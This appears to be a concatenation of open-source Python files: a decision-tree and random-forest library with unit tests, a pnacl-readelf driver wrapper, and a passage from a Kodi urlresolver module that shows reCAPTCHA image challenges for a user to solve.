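# far, and forwards subsequent records to the matching child.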
class Tree:
"""
Represents a single grown or built decision tree.
"""
def __init__(self, data, **kwargs):
assert isinstance(data, Data)
self._data = data
# Root splitting node.
# This can be traversed via [name1][value1][name2][value2]...
self._tree = Node(self)
# The mean absolute error.
self.mae = CDist()
self._mae_clean = True
# Set the metric used to calculate the information gain after an attribute split.
if self.data.is_continuous_class:
self.metric = kwargs.get('metric', DEFAULT_CONTINUOUS_METRIC)
assert self.metric in CONTINUOUS_METRICS
else:
self.metric = kwargs.get('metric', DEFAULT_DISCRETE_METRIC)
assert self.metric in DISCRETE_METRICS
        # The minimum number of samples a node must observe before it becomes
        # eligible to split.
self.splitting_n = kwargs.get('splitting_n', 100)
# Declare the policy for handling missing values for each attribute.
self.missing_value_policy = {}
# Allow the tree to automatically grow and split after an update().
self.auto_grow = kwargs.get('auto_grow', False)
# Determine the threshold at which further splitting is unnecessary
# if enough accuracy has been achieved.
if self.data.is_continuous_class:
# Zero variance is the default continuous stopping criteria.
self.leaf_threshold = kwargs.get('leaf_threshold', 0.0)
else:
# A 100% probability is the default discrete stopping criteria.
self.leaf_threshold = kwargs.get('leaf_threshold', 1.0)
# The total number of leaf nodes.
self.leaf_count = 0
# The total number of samples trained on.
self.sample_count = 0
### Used for forests.
# The prediction accuracy on held-out samples.
self.out_of_bag_accuracy = CDist()
        # Samples not given to the tree for training, from which the
        # out-of-bag accuracy is calculated.
self._out_of_bag_samples = []
# The mean absolute error for predictions on out-of-bag samples.
self._out_of_bag_mae = CDist()
self._out_of_bag_mae_clean = True
def __getitem__(self, attr_name):
return self.tree[attr_name]
@classmethod
def build(cls, data, *args, **kwargs):
"""
Constructs a classification or regression tree in a single batch by
analyzing the given data.
"""
assert isinstance(data, Data)
if data.is_continuous_class:
fitness_func = gain_variance
else:
fitness_func = get_gain
t = cls(data=data, *args, **kwargs)
t._data = data
t.sample_count = len(data)
t._tree = create_decision_tree(
data=data,
attributes=data.attribute_names,
class_attr=data.class_attribute_name,
fitness_func=fitness_func,
wrapper=t,
)
return t
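    # Illustrative batch usage (file name and metric are hypothetical):
    #
    #   data = Data('training.csv')
    #   tree = Tree.build(data, metric=ENTROPY1)
    #   result = tree.test(data)     # CDist; .mean is accuracy or MAE
    #   prediction = tree.predict(next(iter(data)))
    #
    # predict() returns a DDist for a discrete class and a CDist for a
    # continuous one.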
@property
def data(self):
return self._data
@property
def is_continuous_class(self):
return self.data.is_continuous_class
@classmethod
def load(cls, fn):
tree = pickle.load(open(fn))
assert isinstance(tree, cls), "Invalid pickle."
return tree
@property
def out_of_bag_mae(self):
"""
Returns the mean absolute error for predictions on the out-of-bag
samples.
"""
if not self._out_of_bag_mae_clean:
try:
self._out_of_bag_mae = self.test(self.out_of_bag_samples)
self._out_of_bag_mae_clean = True
except NodeNotReadyToPredict:
return
return self._out_of_bag_mae.copy()
@property
def out_of_bag_samples(self):
"""
Returns the out-of-bag samples list, inside a wrapper to keep track
of modifications.
"""
        #TODO:replace with a more generic pass-through wrapper?
class O:
def __init__(self, tree):
self.tree = tree
def __len__(self):
return len(self.tree._out_of_bag_samples)
def append(self, v):
self.tree._out_of_bag_mae_clean = False
return self.tree._out_of_bag_samples.append(v)
def pop(self, v):
self.tree._out_of_bag_mae_clean = False
return self.tree._out_of_bag_samples.pop(v)
def __iter__(self):
for _ in self.tree._out_of_bag_samples:
yield _
return O(self)
def predict(self, record):
record = record.copy()
return self._tree.predict(record)
def save(self, fn):
pickle.dump(self, open(fn, 'w'))
def set_missing_value_policy(self, policy, target_attr_name=None):
"""
        Sets the behavior for one or all attributes to use when a query
        vector traverses the tree and encounters a branch that does not
        exist.
"""
assert policy in MISSING_VALUE_POLICIES, "Unknown policy: %s" % (policy,)
for attr_name in self.data.attribute_names:
if target_attr_name is not None and target_attr_name != attr_name:
continue
self.missing_value_policy[attr_name] = policy
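    # For example, to let every attribute fall back to the nearest previously
    # seen value when a query contains an unseen one:
    #
    #   tree.set_missing_value_policy(USE_NEAREST)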
def test(self, data):
"""
Iterates over the data, classifying or regressing each element and then
finally returns the classification accuracy or mean-absolute-error.
"""
is_cont = self._data.is_continuous_class
agg = CDist()
for record in data:
actual_value = self.predict(record)
expected_value = record[self._data.class_attribute_name]
if is_cont:
assert isinstance(actual_value, CDist)
actual_value = actual_value.mean
agg += abs(actual_value - expected_value)
else:
assert isinstance(actual_value, DDist)
agg += actual_value.best == expected_value
return agg
def to_dict(self):
return self._tree.to_dict()
@property
def tree(self):
return self._tree
def train(self, record):
"""
Incrementally updates the tree with the given sample record.
"""
assert self.data.class_attribute_name in record, "The class attribute must be present in the record."
record = record.copy()
self.sample_count += 1
self.tree.train(record)
def _get_defaultdict_cdist():
return defaultdict(CDist)
class Forest:
def __init__(self, data, tree_kwargs=None, **kwargs):
assert isinstance(data, Data)
self._data = data
# The population of trees.
self.trees = []
# Arguments that will be passed to each tree during init.
self.tree_kwargs = tree_kwargs or {}
self.grow_method = kwargs.get('grow_method', GROW_RANDOM)
assert self.grow_method in GROW_METHODS, "Growth method %s is not supported." % (self.grow_method,)
# The number of trees in the forest.
self.size = kwargs.get('size', 10)
# The ratio of training samples given to each tree.
# The rest are held to test tree accuracy.
self.sample_ratio = kwargs.get('sample_ratio', 0.9)
# The maximum number of out of bag samples to store in each tree.
self.max_out_of_bag_samples = kwargs.get('max_out_of_bag_samples', 1000)
# The method for how we consolidate each tree's prediction into
# a single prediction.
self.weighting_method = kwargs.get('weighting_method', Forest.mean_oob_mae_weight)
# The criteria defining how and when old trees are removed from the
# forest and replaced by new trees.
# This is a callable that is given a list of all the current trees
# and returns a list of trees that should be removed.
self.fell_method = kwargs.get('fell_method', None)
def _fell_trees(self):
"""
Removes trees from the forest according to the specified fell method.
"""
if callable(self.fell_method):
for tree in self.fell_method(list(self.trees)):
self.trees.remove(tree)
def _get_best_prediction(self, record, train=True):
"""
Gets the prediction from the tree with the lowest mean absolute error.
"""
if not self.trees:
return
best = (+1e999999, None)
for tree in self.trees:
best = min(best, (tree.mae.mean, tree))
_, best_tree = best
prediction, tree_mae = best_tree.predict(record, train=train)
return prediction.mean
@staticmethod
def best_oob_mae_weight(trees):
"""
        Returns a single weight of 1.0 assigned to the tree with the smallest
        out-of-bag mean absolute error, ignoring all other trees.
"""
best = (+1e999999, None)
for tree in trees:
oob_mae = tree.out_of_bag_mae
if oob_mae is None or oob_mae.mean is None:
continue
best = min(best, (oob_mae.mean, tree))
best_mae, best_tree = best
if best_tree is None:
return
return [(1.0, best_tree)]
@staticmethod
def mean_oob_mae_weight(trees):
"""
Returns weights proportional to the out-of-bag mean absolute error for each tree.
"""
weights = []
active_trees = []
for tree in trees:
oob_mae = tree.out_of_bag_mae
if oob_mae is None or oob_mae.mean is None:
continue
weights.append(oob_mae.mean)
active_trees.append(tree)
if not active_trees:
return
weights = normalize(weights)
return zip(weights, active_trees)
def _grow_trees(self):
"""
Adds new trees to the forest according to the specified growth method.
"""
if self.grow_method == GROW_AUTO_INCREMENTAL:
self.tree_kwargs['auto_grow'] = True
while len(self.trees) < self.size:
self.trees.append(Tree(data=self.data, **self.tree_kwargs))
@property
def data(self):
return self._data
def predict(self, record):
"""
Attempts to predict the value of the class attribute by aggregating
the predictions of each tree.
        The per-tree predictions are combined using self.weighting_method,
        a callable that takes a list of trees and returns a list of
        (weight, tree) pairs.
"""
# Get raw predictions.
# {tree:raw prediction}
predictions = {}
for tree in self.trees:
_p = tree.predict(record)
if _p is None:
continue
if isinstance(_p, CDist):
if _p.mean is None:
continue
elif isinstance(_p, DDist):
if not _p.count:
continue
predictions[tree] = _p
if not predictions:
return
# Normalize weights and aggregate final prediction.
weights = self.weighting_method(predictions.keys())
if not weights:
return
if self.data.is_continuous_class:
# Merge continuous class predictions.
total = sum(w*predictions[tree].mean for w, tree in weights)
else:
# Merge discrete class predictions.
total = DDist()
for weight, tree in weights:
prediction = predictions[tree]
for cls_value, cls_prob in prediction.probs:
total.add(cls_value, cls_prob*weight)
return total
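    # Minimal sketch of growing and querying a forest incrementally (file name
    # and keyword values hypothetical; the unit tests below show a fuller
    # example):
    #
    #   forest = Forest(data=Data('samples.csv'), size=10,
    #                   grow_method=GROW_AUTO_INCREMENTAL,
    #                   tree_kwargs=dict(metric=ENTROPY2))
    #   for row in Data('samples.csv'):
    #       forest.train(row)
    #   prediction = forest.predict(some_record)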
def set_missing_value_policy(self, policy, target_attr_name=None):
for tree in self.trees:
tree.set_missing_value_policy(policy, target_attr_name)
def test(self, data):
"""
Iterates over the data, classifying or regressing each element and then
finally returns the classification accuracy or mean-absolute-error.
"""
is_cont = self.data.is_continuous_class
agg = CDist()
for record in data:
actual_value = self.predict(record)
if actual_value is None:
continue
expected_value = record[self._data.class_attribute_name]
if is_cont:
assert isinstance(actual_value, CDist), \
"Invalid prediction type: %s" % (type(actual_value),)
actual_value = actual_value.mean
agg += abs(actual_value - expected_value)
else:
assert isinstance(actual_value, DDist), \
"Invalid prediction type: %s" % (type(actual_value),)
agg += actual_value.best == expected_value
return agg
def train(self, record):
"""
Updates the trees with the given training record.
"""
self._fell_trees()
self._grow_trees()
for tree in self.trees:
if random.random() < self.sample_ratio:
tree.train(record)
else:
tree.out_of_bag_samples.append(record)
while len(tree.out_of_bag_samples) > self.max_out_of_bag_samples:
tree.out_of_bag_samples.pop(0)
class Test(unittest.TestCase):
def test_stat(self):
print('Testing statistics classes...')
nums = range(1, 10)
s = CDist()
seen = []
for n in nums:
seen.append(n)
s += n
print('mean:', s.mean)
print('variance:', get_variance(seen))
print('variance:', s.variance)
self.assertAlmostEqual(s.mean, get_mean(nums), 1)
self.assertAlmostEqual(s.variance, get_variance(nums), 2)
self.assertEqual(s.count, 9)
self.assertAlmostEqual(s.probability_lt(s.mean-s.standard_deviation*6), 0.0, 5)
self.assertAlmostEqual(s.probability_lt(s.mean+s.standard_deviation*6), 1.0, 5)
self.assertAlmostEqual(s.probability_gt(s.mean-s.standard_deviation*6), 1.0, 5)
self.assertAlmostEqual(s.probability_gt(s.mean+s.standard_deviation*6), 0.0, 5)
self.assertAlmostEqual(s.probability_in(s.mean, 50), 0.5, 5)
d1 = DDist(['a', 'b', 'a', 'a', 'b'])
d2 = DDist(['a', 'b', 'a', 'a', 'b'])
d3 = DDist(['a', 'b', 'a', 'a', 'b', 'c'])
self.assertEqual(d1, d2)
self.assertNotEqual(d1, d3)
self.assertNotEqual(d2, d3)
self.assertEqual(d1.best, 'a')
self.assertEqual(d1.best_prob, 3/5.)
self.assertEqual(d2.best, 'a')
self.assertEqual(d3.best, 'a')
print('Done.')
def test_data(self):
print('Testing data class...')
# Load data from a file.
data = Data('rdata1')
self.assertEqual(len(data), 16)
data = list(Data('rdata1'))
self.assertEqual(len(data), 16)
# Load data from memory or some other arbitrary source.
data = """a,b,c,d,cls
1,1,1,1,a
1,1,1,2,a
1,1,2,3,a
1,1,2,4,a
1,2,3,5,a
1,2,3,6,a
1,2,4,7,a
1,2,4,8,a
2,3,5,1,b
2,3,5,2,b
2,3,6,3,b
2,3,6,4,b
2,4,7,5,b
2,4,7,6,b
2,4,8,7,b
2,4,8,8,b""".strip().split('\n')
rows = list(csv.DictReader(data))
self.assertEqual(len(rows), 16)
rows = Data(
[r.split(',') for r in data[1:]],
order=['a', 'b', 'c', 'd', 'cls'],
types=dict(a=DIS, b=DIS, c=DIS, d=DIS, cls=NOM),
modes=dict(cls=CLS))
self.assertEqual(len(rows), 16)
self.assertEqual(len(list(rows)), 16)
for row in rows:
print(row)
a, b = rows.split(ratio=0.1)
self.assertEqual(len(rows), len(a)+len(b))
print('-'*80)
print('a:')
for row in a:
print(row)
print('-'*80)
print('b:')
for row in b:
print(row)
print('Done.')
def test_batch_tree(self):
print('Testing batch tree...')
# If we set no leaf threshold for a continuous class
# then there will be the same number of leaf nodes
        # as there are records.
t = Tree.build(Data('rdata2'))
self.assertEqual(type(t), Tree)
print("Tree:")
pprint(t.to_dict(), indent=4)
self.assertEqual(set(t._tree['b'].keys()), set([1, 2, 3, 4]))
result = t.test(Data('rdata1'))
self.assertEqual(type(result), CDist)
print('MAE:', result.mean)
self.assertAlmostEqual(result.mean, 0.001368, 5)
self.assertEqual(t.leaf_count, 16)
# If we set a leaf threshold, then this will limit the number of leaf
# nodes created, speeding up prediction, at the expense of increasing
# the mean absolute error.
t = Tree.build(Data('rdata2'), leaf_threshold=0.0005)
print("Tree:")
pprint(t.to_dict(), indent=4)
print(t._tree['b'].keys())
self.assertEqual(t._tree.get_values('b'), set([1, 2, 3, 4]))
result = t.test(Data('rdata1'))
print('MAE:', result.mean)
self.assertAlmostEqual(result.mean, 0.00623, 5)
self.assertEqual(t.leaf_count, 10)
t = Tree.build(Data('cdata1'))
print("Tree:")
self.assertEqual(t['Age']['36 - 55'].attr_name, 'Marital Status')
self.assertEqual(t['Age']['36 - 55']\
.get_values('Marital Status'), set(['single', 'married']))
self.assertEqual(set(t['Age'].keys()), set(['< 18', '18 - 35', '36 - 55', '> 55']))
self.assertEqual(t['Age']['18 - 35'].best, 'won\'t buy')
self.assertEqual(t['Age']['36 - 55']['Marital Status']['single'].best, 'will buy')
d = t.to_dict()
pprint(d, indent=4)
result = t.test(Data('cdata1'))
print('Accuracy:', result.mean)
self.assertAlmostEqual(result.mean, 1.0, 5)
t = Tree.build(Data('cdata2'))
pprint(t.to_dict(), indent=4)
result = t.test(Data('cdata2'))
print('Accuracy:', result.mean)
self.assertAlmostEqual(result.mean, 1.0, 5)
result = t.test(Data('cdata3'))
print('Accuracy:', result.mean)
self.assertAlmostEqual(result.mean, 0.75, 5)
# Send it a corpus that's purposefully difficult to predict.
t = Tree.build(Data('cdata4'))
pprint(t.to_dict(), indent=4)
result = t.test(Data('cdata4'))
print('Accuracy:', result.mean)
self.assertAlmostEqual(result.mean, 0.5, 5)
# Send it a case it's never seen.
with self.assertRaises(AssertionError):
# By default, it should throw an exception because it hasn't been
# given a policy for resolving unseen attribute value.
t.predict(dict(a=1, b=2, c=3, d=4))
# But if we tell it to use the nearest value, then it should pass.
t.set_missing_value_policy(USE_NEAREST)
result = t.predict(dict(a=1, b=2, c=3, d=4))
print(result)
print('Done.')
def test_online_tree(self):
print('Testing online tree...')
rdata3 = Data('rdata3')
rdata3_lst = list(rdata3)
cdata2 = Data('cdata2')
cdata2_lst = list(cdata2)
cdata5 = Data('cdata5')
cdata5_lst = list(cdata5)
tree = Tree(cdata2, metric=ENTROPY1)
for row in cdata2:
tree.train(row)
node = tree._tree
attr_gains = [(node.get_gain(attr_name), attr_name) for attr_name in node.attributes]
attr_gains.sort()
        # With traditional entropy, a, b, and c all evenly divide the class
# and therefore have the same gain, even though all three
# have different value frequencies.
self.assertEqual(attr_gains,
[(0.0, 'd'), (1.0, 'a'), (1.0, 'b'), (1.0, 'c')])
tree = Tree(cdata2, metric=ENTROPY2)
for row in cdata2:
tree.train(row)
self.assertEqual(set(node.attributes), set(['a', 'b', 'c', 'd']))
node = tree._tree
attr_gains = [(node.get_gain(attr_name), attr_name) for attr_name in node.attributes]
attr_gains.sort()
# With entropy metric 2, attributes that have fewer unique values
# will have a slightly greater gain relative to attributes with more
# unique values.
self.assertEqual(attr_gains,
[(-0.375, 'd'), (0.625, 'c'), (0.875, 'b'), (1.0, 'a')])
tree = Tree(rdata3, metric=VARIANCE1)
for row in rdata3:
tree.train(row)
node = tree._tree
self.assertEqual(set(node.attributes), set(['a', 'b', 'c', 'd']))
attr_gains = [(node.get_gain(attr_name), attr_name) for attr_name in node.attributes]
attr_gains.sort()
        # With variance metric 1, gain is based purely on the reduction in
        # class variance across the attribute's values.
self.assertEqual([v for _, v in attr_gains], ['d', 'a', 'b', 'c'])
tree = Tree(rdata3, metric=VARIANCE2)
for row in rdata3:
tree.train(row)
node = tree._tree
self.assertEqual(set(node.attributes), set(['a', 'b', 'c', 'd']))
attr_gains = [(node.get_gain(attr_name), attr_name) for attr_name in node.attributes]
attr_gains.sort()
        # With variance metric 2, attributes that have fewer unique values
        # will have a slightly greater gain relative to attributes with more
        # unique values.
self.assertEqual([v for _, v in attr_gains], ['d', 'c', 'b', 'a'])
# Incrementally grow a classification tree.
print("-"*80)
print("Incrementally growing classification tree...")
tree = Tree(cdata5, metric=ENTROPY2, splitting_n=17, auto_grow=True)
for row in cdata5:
tree.train(row)
acc = tree.test(cdata5)
print('Initial accuracy:', acc.mean)
self.assertEqual(acc.mean, 0.25)
# Update tree several times to give leaf nodes potential time to split.
for _ in range(5):
for row in cdata5:
#print(row
tree.train(row)
acc = tree.test(cdata5)
print('Accuracy:', acc.mean)
print('Final tree:')
pprint(tree.to_dict(), indent=4)
# Confirm no more nodes have split, since the optimal split has
# already been found and the tree is fully grown.
self.assertEqual(tree['b'][1].ready_to_split, False)
self.assertEqual(tree['b'][1]._branches, {})
# Test accuracy of fully grown tree.
acc = tree.test(cdata5)
self.assertEqual(acc.mean, 1.0)
# Incrementally grow a regression tree.
print("-"*80)
print("Incrementally growing regression tree...")
tree = Tree(rdata3, metric=VARIANCE2, splitting_n=17, auto_grow=True, leaf_threshold=0.0)
for row in rdata3:
tree.train(row)
mae = tree.test(rdata3)
print('Initial MAE:', mae.mean)
self.assertAlmostEqual(mae.mean, 0.4, 5)
for _ in range(20):
for row in rdata3:
tree.train(row)
mae = tree.test(rdata3)
print('MAE:', mae.mean)
print("Final tree:")
pprint(tree.to_dict(), indent=4)
self.assertEqual(mae.mean, 0.0)
print('Done.')
def test_forest(self):
print('Testing forest...')
print('Growing forest incrementally...')
cdata2 = Data('cdata2')
cdata2_lst = list(cdata2)
# Incrementally train and test the forest on the same data.
forest = Forest(
data=cdata2,
size=10, # Grow 10 trees.
sample_ratio=0.8, # Train each tree on 80% of all records.
grow_method=GROW_AUTO_INCREMENTAL, # Incrementally grow each tree.
weighting_method=Forest.mean_oob_mae_weight,
tree_kwargs=dict(metric=ENTROPY2),
)
mae = None
for _ in range(10):
for row in cdata2_lst:
forest.train(row)
mae = forest.test(cdata2_lst)
print('Forest MAE:', mae.mean)
self.assertEqual(mae.mean, 1.0)
trees = list(forest.trees)
trees.sort(key=lambda t: t.out_of_bag_mae.mean)
print('Best tree:')
pprint(trees[-1].to_dict(), indent=4)
self.assertEqual(trees[-1].auto_grow, True)
print('Done.')
def test_milksets(self):
try:
from milksets import wine, yeast # pylint: disable=import-outside-toplevel
except ImportError:
print('Skipping milkset tests because milksets is not installed.')
print('Run `sudo pip install milksets` and rerun these tests.')
return
def leave_one_out(all_data, metric=None):
test_data, train_data = all_data.split(leave_one_out=True)
tree = Tree.build(train_data, metric=metric)
tree.set_missing_value_policy(USE_NEAREST)
result = tree.test(test_data)
return result.mean
def cross_validate(all_data, epoches=10, test_ratio=0.25, metric=None):
accuracies = []
for epoche in range(epoches):
test_data, train_data = all_data.split(ratio=test_ratio)
tree = Tree.build(train_data, metric=metric)
tree.set_missing_value_policy(USE_NEAREST)
result = tree.test(test_data)
accuracies.append(result.mean)
return sum(accuracies)/float(len(accuracies))
# Load wine dataset.
# Each record has 13 continuous features
# and one discrete class containing 2 unique values.
print('Loading UCI wine data...')
wine_data = Data(
[list(a)+[b] for a, b in zip(*wine.load())],
order=map(str, range(13))+['cls'],
types=[CON]*13 + [DIS],
modes=dict(cls=CLS))
self.assertEqual(len(wine_data), 178)
self.assertEqual(len(list(wine_data)), 178)
# Load yeast dataset.
# Each record has 8 continuous features
# and one discrete class containing 10 values.
print('Loading UCI yeast data...')
yeast_data = Data(
[list(a)+[b] for a, b in zip(*yeast.load())],
order=map(str, range(8))+['cls'],
types=[CON]*8 + [DIS],
modes=dict(cls=CLS))
self.assertEqual(len(yeast_data), 1484)
self.assertEqual(len(list(yeast_data)), 1484)
acc = leave_one_out(wine_data, metric=ENTROPY1)
print('Wine leave-one-out accuracy: %0.2f' % (acc,))
acc = cross_validate(wine_data, metric=ENTROPY1, test_ratio=0.01, epoches=25)
print('Wine cross-validated accuracy: %0.2f' % (acc,))
acc = leave_one_out(yeast_data, metric=ENTROPY1)
print('Yeast leave-one-out accuracy: %0.2f' % (acc,))
acc = cross_validate(yeast_data, metric=ENTROPY1, test_ratio=0.005, epoches=25)
print('Yeast cross-validated accuracy: %0.2f' % (acc,))
def test_entropy(self):
# Lopsided distribution with mostly all events in one group
# is low entropy.
self.assertAlmostEqual(entropy({+1:10, -1:10, 0:980}), 0.1018576)
# Everything in one group is 0 entropy.
self.assertAlmostEqual(entropy({0:1000}), 0.0)
# Everything equally divided is highest entropy.
self.assertAlmostEqual(entropy({+1:500, -1:500}), 1.0)
data1 = {+1:1, -1:1}#,0:200-2}
data2 = {+1:100, -1:100}
# Entropy1 doesn't care about size.
e11 = entropy(data1, method=ENTROPY1)
e21 = entropy(data2, method=ENTROPY1)
self.assertEqual(e11, 1.0)
self.assertEqual(e11, e21)
# Entropy2 takes size into account.
e12 = entropy(data1, method=ENTROPY2)
e22 = entropy(data2, method=ENTROPY2)
self.assertEqual(e12, 0.5)
self.assertEqual(e22, 0.995)
# Entropy3 takes large numbers of values into account, but otherwise ignores size.
e13 = entropy(data1, method=ENTROPY3)
e23 = entropy(data2, method=ENTROPY3)
self.assertEqual(e13, -49.0)
self.assertEqual(e23, 0.5)
if __name__ == '__main__':
unittest.main()
| lgpl-3.0 | 1,056,484,484,026,937,900 | 34.088957 | 158 | 0.57929 | false |
endlessm/chromium-browser | native_client/pnacl/driver/pnacl-readelf.py | 2 | 3751 | #!/usr/bin/python
# Copyright (c) 2012 The Native Client Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from __future__ import print_function
from driver_env import env
from driver_log import Log
import driver_tools
import filetype
EXTRA_ENV = {
'INPUTS': '',
'FLAGS': '',
}
PATTERNS = [
( '(-.*)', "env.append('FLAGS', $0)"),
( '(.*)', "env.append('INPUTS', pathtools.normalize($0))"),
]
def main(argv):
env.update(EXTRA_ENV)
driver_tools.ParseArgs(argv, PATTERNS)
inputs = env.get('INPUTS')
if len(inputs) == 0:
Log.Fatal("No input files given")
for infile in inputs:
driver_tools.CheckPathLength(infile)
env.push()
env.set('input', infile)
if filetype.IsLLVMBitcode(infile):
# Hack to support newlib build.
# Newlib determines whether the toolchain supports .init_array, etc., by
# compiling a small test and looking for a specific section tidbit using
# "readelf -S". Since pnacl compiles to bitcode, readelf isn't available.
# (there is a line: "if ${READELF} -S conftest | grep -e INIT_ARRAY"
# in newlib's configure file).
# TODO(sehr): we may want to implement a whole readelf on bitcode.
flags = env.get('FLAGS')
if len(flags) == 1 and flags[0] == '-S':
print('INIT_ARRAY')
return 0
Log.Fatal('Cannot handle pnacl-readelf %s' % str(argv))
return 1
driver_tools.Run('"${READELF}" ${FLAGS} ${input}')
env.pop()
# only reached in case of no errors
return 0
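# Illustrative invocation (assuming this driver is installed as pnacl-readelf
# on PATH):
#
#   pnacl-readelf -S conftest.o
#
# prints "INIT_ARRAY" when conftest.o is LLVM bitcode, which satisfies
# newlib's configure probe; genuine ELF inputs fall through to ${READELF}.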
def get_help(unused_argv):
return """
Usage: %s <option(s)> elf-file(s)
Display information about the contents of ELF format files
Options are:
-a --all Equivalent to: -h -l -S -s -r -d -V -A -I
-h --file-header Display the ELF file header
-l --program-headers Display the program headers
--segments An alias for --program-headers
-S --section-headers Display the sections' header
--sections An alias for --section-headers
-g --section-groups Display the section groups
-t --section-details Display the section details
-e --headers Equivalent to: -h -l -S
-s --syms Display the symbol table
--symbols An alias for --syms
-n --notes Display the core notes (if present)
-r --relocs Display the relocations (if present)
-u --unwind Display the unwind info (if present)
-d --dynamic Display the dynamic section (if present)
-V --version-info Display the version sections (if present)
-A --arch-specific Display architecture specific information (if any).
-c --archive-index Display the symbol/file index in an archive
-D --use-dynamic Use the dynamic section info when displaying symbols
-x --hex-dump=<number|name>
Dump the contents of section <number|name> as bytes
-p --string-dump=<number|name>
Dump the contents of section <number|name> as strings
-R --relocated-dump=<number|name>
Dump the contents of section <number|name> as relocated bytes
-w[lLiaprmfFsoR] or
--debug-dump[=rawline,=decodedline,=info,=abbrev,=pubnames,=aranges,=macro,=frames,=str,=loc,=Ranges]
Display the contents of DWARF2 debug sections
-I --histogram Display histogram of bucket list lengths
-W --wide Allow output width to exceed 80 characters
@<file> Read options from <file>
-H --help Display this information
-v --version Display the version number of readelf
""" % env.getone('SCRIPT_NAME')
| bsd-3-clause | 4,530,193,218,533,686,300 | 39.333333 | 103 | 0.628099 | false |
kreatorkodi/repository.torrentbr | script.module.urlresolver/lib/urlresolver/plugins/lib/recaptcha_v2.py | 1 | 7299 | # -*- coding: utf-8 -*-
"""
urlresolver XBMC Addon
Copyright (C) 2016 tknorris
Derived from Shani's LPro Code (https://github.com/Shani-08/ShaniXBMCWork2/blob/master/plugin.video.live.streamspro/unCaptcha.py)
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
reusable captcha methods
"""
import re
import os
import xbmcgui
from urlresolver import common
class cInputWindow(xbmcgui.WindowDialog):
def __init__(self, *args, **kwargs):
bg_image = os.path.join(common.addon_path, 'resources', 'images', 'DialogBack2.png')
check_image = os.path.join(common.addon_path, 'resources', 'images', 'checked.png')
button_fo = os.path.join(common.kodi.get_path(), 'resources', 'skins', 'Default', 'media', 'button-fo.png')
button_nofo = os.path.join(common.kodi.get_path(), 'resources', 'skins', 'Default', 'media', 'button-nofo.png')
self.cancelled = False
self.chk = [0] * 9
self.chkbutton = [0] * 9
self.chkstate = [False] * 9
imgX, imgY, imgw, imgh = 436, 210, 408, 300
ph, pw = imgh / 3, imgw / 3
x_gap = 70
y_gap = 70
button_gap = 40
button_h = 40
button_y = imgY + imgh + button_gap
middle = imgX + (imgw / 2)
win_x = imgX - x_gap
win_y = imgY - y_gap
win_h = imgh + 2 * y_gap + button_h + button_gap
win_w = imgw + 2 * x_gap
ctrlBackgound = xbmcgui.ControlImage(win_x, win_y, win_w, win_h, bg_image)
self.addControl(ctrlBackgound)
self.msg = '[COLOR red]%s[/COLOR]' % (kwargs.get('msg'))
self.strActionInfo = xbmcgui.ControlLabel(imgX, imgY - 30, imgw, 20, self.msg, 'font13')
self.addControl(self.strActionInfo)
img = xbmcgui.ControlImage(imgX, imgY, imgw, imgh, kwargs.get('captcha'))
self.addControl(img)
self.iteration = kwargs.get('iteration')
self.strActionInfo = xbmcgui.ControlLabel(imgX, imgY + imgh, imgw, 20, common.i18n('captcha_round') % (str(self.iteration)), 'font40')
self.addControl(self.strActionInfo)
self.cancelbutton = xbmcgui.ControlButton(middle - 110, button_y, 100, button_h, common.i18n('cancel'), focusTexture=button_fo, noFocusTexture=button_nofo, alignment=2)
self.okbutton = xbmcgui.ControlButton(middle + 10, button_y, 100, button_h, common.i18n('ok'), focusTexture=button_fo, noFocusTexture=button_nofo, alignment=2)
self.addControl(self.okbutton)
self.addControl(self.cancelbutton)
for i in xrange(9):
row = i / 3
col = i % 3
x_pos = imgX + (pw * col)
y_pos = imgY + (ph * row)
self.chk[i] = xbmcgui.ControlImage(x_pos, y_pos, pw, ph, check_image)
self.addControl(self.chk[i])
self.chk[i].setVisible(False)
self.chkbutton[i] = xbmcgui.ControlButton(x_pos, y_pos, pw, ph, str(i + 1), font='font1', focusTexture=button_fo, noFocusTexture=button_nofo)
self.addControl(self.chkbutton[i])
for i in xrange(9):
row_start = (i / 3) * 3
right = row_start + (i + 1) % 3
left = row_start + (i - 1) % 3
up = (i - 3) % 9
down = (i + 3) % 9
self.chkbutton[i].controlRight(self.chkbutton[right])
self.chkbutton[i].controlLeft(self.chkbutton[left])
if i <= 2:
self.chkbutton[i].controlUp(self.okbutton)
else:
self.chkbutton[i].controlUp(self.chkbutton[up])
if i >= 6:
self.chkbutton[i].controlDown(self.okbutton)
else:
self.chkbutton[i].controlDown(self.chkbutton[down])
self.okbutton.controlLeft(self.cancelbutton)
self.okbutton.controlRight(self.cancelbutton)
self.cancelbutton.controlLeft(self.okbutton)
self.cancelbutton.controlRight(self.okbutton)
self.okbutton.controlDown(self.chkbutton[2])
self.okbutton.controlUp(self.chkbutton[8])
self.cancelbutton.controlDown(self.chkbutton[0])
self.cancelbutton.controlUp(self.chkbutton[6])
self.setFocus(self.okbutton)
def get(self):
self.doModal()
self.close()
if not self.cancelled:
return [i for i in xrange(9) if self.chkstate[i]]
def onControl(self, control):
if control == self.okbutton and any(self.chkstate):
self.close()
elif control == self.cancelbutton:
self.cancelled = True
self.close()
else:
label = control.getLabel()
if label.isnumeric():
index = int(label) - 1
self.chkstate[index] = not self.chkstate[index]
self.chk[index].setVisible(self.chkstate[index])
def onAction(self, action):
if action == 10:
self.cancelled = True
self.close()
class UnCaptchaReCaptcha:
net = common.Net()
def processCaptcha(self, key, lang):
headers = {'Referer': 'https://www.google.com/recaptcha/api2/demo', 'Accept-Language': lang}
html = self.net.http_GET('http://www.google.com/recaptcha/api/fallback?k=%s' % (key), headers=headers).content
token = ''
iteration = 0
while True:
payload = re.findall('"(/recaptcha/api2/payload[^"]+)', html)
iteration += 1
message = re.findall('<label[^>]+class="fbc-imageselect-message-text"[^>]*>(.*?)</label>', html)
if not message:
message = re.findall('<div[^>]+class="fbc-imageselect-message-error">(.*?)</div>', html)
if not message:
token = re.findall('"this\.select\(\)">(.*?)</textarea>', html)[0]
if token:
common.log_utils.log_debug('Captcha Success: %s' % (token))
else:
common.log_utils.log_debug('Captcha Failed: %s')
break
else:
message = message[0]
payload = payload[0]
